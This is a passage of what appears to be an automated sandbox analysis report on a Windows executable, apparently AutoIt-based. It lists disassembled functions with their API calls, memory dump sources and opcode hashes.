                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C198AC
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C198F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                  • String ID: @
                                                  • API String ID: 4150878124-2766056989
                                                  • Opcode ID: 89642da8f7fe8b47f694cd87536696f3b531dbb3663e6234f3875a343e01efcb
                                                  • Instruction ID: b98cf4b7f1ba76adca52c51ee0cdbce1d7c61e905580eaa8574a373d3d763a6e
                                                  • Opcode Fuzzy Hash: 89642da8f7fe8b47f694cd87536696f3b531dbb3663e6234f3875a343e01efcb
                                                  • Instruction Fuzzy Hash: B741507690111CBFDB10DFA4CC91ADEBBB8EB16300F044099F959B7191DA706F85DBA0
                                                  Function 00C47946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C4F910,00000000,?,?,?,?), ref: 00C479DF
                                                  • GetWindowLongW.USER32 ref: 00C479FC
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C47A0C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Long
                                                  • String ID: SysTreeView32
                                                  • API String ID: 847901565-1698111956
                                                  • Opcode ID: 6430de92ad307af1c8e1759270bcb8c5d4616cb85a0b7bf81e366cf7df03ca3f
                                                  • Instruction ID: b2dc95ae5e94bb25a5231b20f2f094c441f5c6b9c513e5c666367e7ea2091757
                                                  • Opcode Fuzzy Hash: 6430de92ad307af1c8e1759270bcb8c5d4616cb85a0b7bf81e366cf7df03ca3f
                                                  • Instruction Fuzzy Hash: E331BE31204206AFDB218F38DC45BEA77A9FB55324F248729F875A22E0D731EE519B50
                                                  Function 00C473D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C47461
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C47475
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C47499
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: 6848040ecd14e114f6fb3f890617db213d313c1b61aa8fc146f74a1c0a48ccda
                                                  • Instruction ID: 2c6fb41dcb4551812d6bdc7903be8537735160d0c9da3ba6b8bb9da8dd6ed510
                                                  • Opcode Fuzzy Hash: 6848040ecd14e114f6fb3f890617db213d313c1b61aa8fc146f74a1c0a48ccda
                                                  • Instruction Fuzzy Hash: 8B219F32500218ABDF118E64CC46FEA3B79FB48724F111214FE156B190DBB5AC51DBA0
                                                  Function 00C47B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C47C4A
                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C47C58
                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C47C5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyWindow
                                                  • String ID: msctls_updown32
                                                  • API String ID: 4014797782-2298589950
                                                  • Opcode ID: ab58982646c1dc00c0c711d10eb4e27de7b78d18de7adcd4ab891c98bf493175
                                                  • Instruction ID: 6985e1c822791ef405698dc68cd52cddff969018caf5e4bf287bb0f7e12015b1
                                                  • Opcode Fuzzy Hash: ab58982646c1dc00c0c711d10eb4e27de7b78d18de7adcd4ab891c98bf493175
                                                  • Instruction Fuzzy Hash: CF215EB5604208AFDB10DF28DCC1EAA37ECFF5A364B140559FA159B3A1CB71ED118B60
                                                  Function 00C46CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C46D3B
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C46D4B
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C46D70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: 74281a2dd2ef3bdc3c2c9c398a4d707c054a02f0a1217c6fd2fee853ba01b4df
                                                  • Instruction ID: b8bf9a3feffe2bb4e036fd9b47fa6864c42d6aa8ea38a8c53965ad4c20eafa55
                                                  • Opcode Fuzzy Hash: 74281a2dd2ef3bdc3c2c9c398a4d707c054a02f0a1217c6fd2fee853ba01b4df
                                                  • Instruction Fuzzy Hash: 1721CF32610118BFEF118F54CC85FBB3BBAFF8A760F018128F9559B1A4CA719C519BA0
                                                  Function 00C4770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C47772
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C47787
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C47794
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: d34a74ce3b2f9fc3755a762092c842a4933c463b64e4fc100e9108b27070e076
                                                  • Instruction ID: 7950aea5a676beac8134c50aa9de8da9a8c11fed24fe7c75e2aafaecd295660f
                                                  • Opcode Fuzzy Hash: d34a74ce3b2f9fc3755a762092c842a4933c463b64e4fc100e9108b27070e076
                                                  • Instruction Fuzzy Hash: C4112372240208BBEF215F65CC01FEB77A8FF89B64F014228FA55A2090C772E811CB20
                                                  Function 00BC4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4B83,?), ref: 00BC4C44
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BC4C56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: 9c268e8e818e3507b9298d74f45a4e7065ddabb99edf8a47706e337a120eb16d
                                                  • Instruction ID: d49a6ecaac193df5f23074baae929dd70311e918b28a13b847e2662805a2bdc6
                                                  • Opcode Fuzzy Hash: 9c268e8e818e3507b9298d74f45a4e7065ddabb99edf8a47706e337a120eb16d
                                                  • Instruction Fuzzy Hash: B3D0E275910712CFD7209F31D918B0A76E4EF06391B11887E98A6D6160E7B0D880DA50
                                                  Function 00BC4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4BD0,?,00BC4DEF,?,(l,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BC4C11
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BC4C23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: 4bb75fd3da758c763d83544b7818f9d21ad704d127e5c825f9862013789cc962
                                                  • Instruction ID: 3b9535aa3862e5b6b3a66913eab94f88cec283a14717363975573c5683b44904
                                                  • Opcode Fuzzy Hash: 4bb75fd3da758c763d83544b7818f9d21ad704d127e5c825f9862013789cc962
                                                  • Instruction Fuzzy Hash: 4CD0E275911712CFD720AF75D918B0BBAE5EF0A392B11C87E9886D6160E7B0D881CA50
                                                  Function 00C40DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00C41039), ref: 00C40DF5
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C40E07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  • Opcode ID: 43285db51ac351d03f13eec56e44f65dd683ed61ab9d5bee29da23b150edfa8c
                                                  • Instruction ID: e8b877120ca320a2f8a669375e062249e757f0f569f768276423d8c72973b4e2
                                                  • Opcode Fuzzy Hash: 43285db51ac351d03f13eec56e44f65dd683ed61ab9d5bee29da23b150edfa8c
                                                  • Instruction Fuzzy Hash: 1ED01775950732CFD7209F75C80878AB6E5FF06352F21CC3E99DAD6151E6B0D8A0CA50
                                                  Function 00C390E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C38CF4,?,00C4F910), ref: 00C390EE
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C39100
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                  • API String ID: 2574300362-199464113
                                                  • Opcode ID: 0cf03057afba2a44b63265d07d9176bb434a195ac435d9f929a9a23bfa214dd2
                                                  • Instruction ID: 5b70a1a467d2ff86e534b485d3b584ea313950a5418002a7d824c9c09eaecf8a
                                                  • Opcode Fuzzy Hash: 0cf03057afba2a44b63265d07d9176bb434a195ac435d9f929a9a23bfa214dd2
                                                  • Instruction Fuzzy Hash: E4D0EC75560713CFD7209F71D81964A76D4AF06351B11883D9495D6650E6B0C880C650
                                                  Function 00C01714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LocalTime__swprintf
                                                  • String ID: %.3d$WIN_XPe
                                                  • API String ID: 2070861257-2409531811
                                                  • Opcode ID: 1e5fcc7e6287c5542fa37e6d3c0409ce7621aba93284bde56f7f8f951691b89c
                                                  • Instruction ID: 2481ed96120c5af5c498c40d51175581bcaa7a6375f2e239978db2227e7bb151
                                                  • Opcode Fuzzy Hash: 1e5fcc7e6287c5542fa37e6d3c0409ce7621aba93284bde56f7f8f951691b89c
                                                  • Instruction Fuzzy Hash: 30D01771848108EBCB109A969888DBDB7BCAB19311F5804A2F806A2080E3318B94EA21
                                                  Function 00C1717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7531bbf66e198e11d5d439dd9f3d700f1adc1bce56df4a6139075bdcb0aac0c1
                                                  • Instruction ID: 582f43c65019bf7562ac9e2c91368cfcffded31e0e5b7222491eee7ba330ef95
                                                  • Opcode Fuzzy Hash: 7531bbf66e198e11d5d439dd9f3d700f1adc1bce56df4a6139075bdcb0aac0c1
                                                  • Instruction Fuzzy Hash: DEC17175A04216EFCB14CF94C884EAEBBB5FF49714B148698F815DB251D730DE81EB90
                                                  Function 00C3E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C3E0BE
                                                  • CharLowerBuffW.USER32(?,?), ref: 00C3E101
                                                    • Part of subcall function 00C3D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C3D7C5
                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C3E301
                                                  • _memmove.LIBCMT ref: 00C3E314
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                  • String ID:
                                                  • API String ID: 3659485706-0
                                                  • Opcode ID: 4b70355e07dbdc2ea3b57ea38836b363ebebc8e920f61ce2bc501685bda8f90c
                                                  • Instruction ID: 9e488e37b667d793053baac3a620ac93ea13ec183701b4ded769f8c0812ca005
                                                  • Opcode Fuzzy Hash: 4b70355e07dbdc2ea3b57ea38836b363ebebc8e920f61ce2bc501685bda8f90c
                                                  • Instruction Fuzzy Hash: 95C148716183019FC714DF28C480A6ABBE4FF89714F1489ADF8999B391D771EA46CF82
                                                  Function 00C38093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00C380C3
                                                  • CoUninitialize.OLE32 ref: 00C380CE
                                                    • Part of subcall function 00C1D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C1D5D4
                                                  • VariantInit.OLEAUT32(?), ref: 00C380D9
                                                  • VariantClear.OLEAUT32(?), ref: 00C383AA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                  • String ID:
                                                  • API String ID: 780911581-0
                                                  • Opcode ID: e1c81a3fe2a54fb47262faaf9ec0af04ce89cfb592928a09566fafba503235fb
                                                  • Instruction ID: 93bec8043ce5e74187223de0264d8db021463cbfcfcea7c417062c8b0a878cef
                                                  • Opcode Fuzzy Hash: e1c81a3fe2a54fb47262faaf9ec0af04ce89cfb592928a09566fafba503235fb
                                                  • Instruction Fuzzy Hash: 55A155756147019FDB40EF25C885B2AB7E4BF89764F04845CF99A9B3A1CB30ED49CB82
                                                  Function 00C17530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C52C7C,?), ref: 00C176EA
                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C52C7C,?), ref: 00C17702
                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00C4FB80,000000FF,?,00000000,00000800,00000000,?,00C52C7C,?), ref: 00C17727
                                                  • _memcmp.LIBCMT ref: 00C17748
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FromProg$FreeTask_memcmp
                                                  • String ID:
                                                  • API String ID: 314563124-0
                                                  • Opcode ID: ecdd172f75f57197ab036b09f5ac8ed8f20759108a9db80e194092c4ae54105b
                                                  • Instruction ID: c1a7b3a39934d19eba4b08aa1702479fc815c9778b1f62c02bca370251909ce8
                                                  • Opcode Fuzzy Hash: ecdd172f75f57197ab036b09f5ac8ed8f20759108a9db80e194092c4ae54105b
                                                  • Instruction Fuzzy Hash: 4A813C75A00109EFCB00DFA4C984EEEB7B9FF89315F204598F516AB250DB71AE46CB60
                                                  Function 00C1687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Variant$AllocClearCopyInitString
                                                  • String ID:
                                                  • API String ID: 2808897238-0
                                                  • Opcode ID: 0caf9d90201d341b986a2740ad2196cc5a8320a02c5a096c26803739413db822
                                                  • Instruction ID: 3f3b93c9fcd0d02fa149895e4836278780da9ca22a833d84689da45c383b27ec
                                                  • Opcode Fuzzy Hash: 0caf9d90201d341b986a2740ad2196cc5a8320a02c5a096c26803739413db822
                                                  • Instruction Fuzzy Hash: 12519F746043029BDB24AF66D895BBAB7E5AF46310F20D81FE596DB291DB70D8C0BB01
                                                  Function 00C497F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(00EED778,?), ref: 00C49863
                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00C49896
                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00C49903
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
